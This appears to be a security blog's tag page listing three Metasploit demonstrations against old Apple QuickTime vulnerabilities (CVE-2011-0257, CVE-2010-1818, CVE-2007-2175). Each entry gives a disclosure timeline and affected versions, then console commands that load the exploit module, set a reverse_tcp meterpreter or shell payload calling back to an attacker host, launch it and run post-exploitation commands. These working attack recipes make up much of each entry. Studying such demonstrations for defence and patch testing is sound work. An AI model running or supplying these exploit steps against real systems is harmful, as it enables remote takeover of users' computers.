aka wow on ZATAZ.com
Posts tagged QuickTime
CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo
08 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03
PoC provided by :
MC
Reference(s) :
Affected version(s) :
All Apple QuickTime Player previous to version 7.7
Tested on Windows XP SP3 with :
Apple QuickTime Player 7.6 (472)
Description :
This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.
Commands :
use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jgetuid
sysinfo
CVE-2010-1818 : Metasploit _Marshaled_pUnk QuickTime Remote Code Execution
01 year ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by HBelite and disclosed to ZDI
Vulnerability disclosed by ZDI to the vendor the 2010-06-30
Exploit-DB PoC provided by Ruben Santamarta the 2010-08-30
Metasploit PoC provided the 2010-08-30
Coordinated vulnerability disclosure the 2010-08-31
PoC provided by :
Ruben Santamarta
jduck
Reference(s) :
Affected version(s) :
Apple QuickTime 7.6.7
Tested on Windows XP SP3 with :
QuickTime 7.6.7
Internet Explorer 8
Description :
This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.
Commands :
use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
CVE-2007-2175 : Apple QTJava toQTPointer() Arbitrary Memory Access
01 year ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by Shane Macaulay & Dino Dai Zovi during CanSecWest 2007
Vulnerability reported to ZDI by Dino A. Dai Zovi & Shane Macaulay
Vulnerability reported to the vendor by ZDI the 2007-04-23
Coordinated vulnerability disclosure the 2007-05-01
Metasploit PoC provided the 2007-05-29
PoC provided by :
hdm
kf
ddz
Reference(s) :
Affected version(s) :
QuickTime 7 previous version 7.1.6 for Windows and OS X
Tested on Windows XP SP3 with :
QuickTime 7.1.5
Description :
This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.
Commands :
use exploit/multi/browser/qtjava_pointer
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
Recent Comments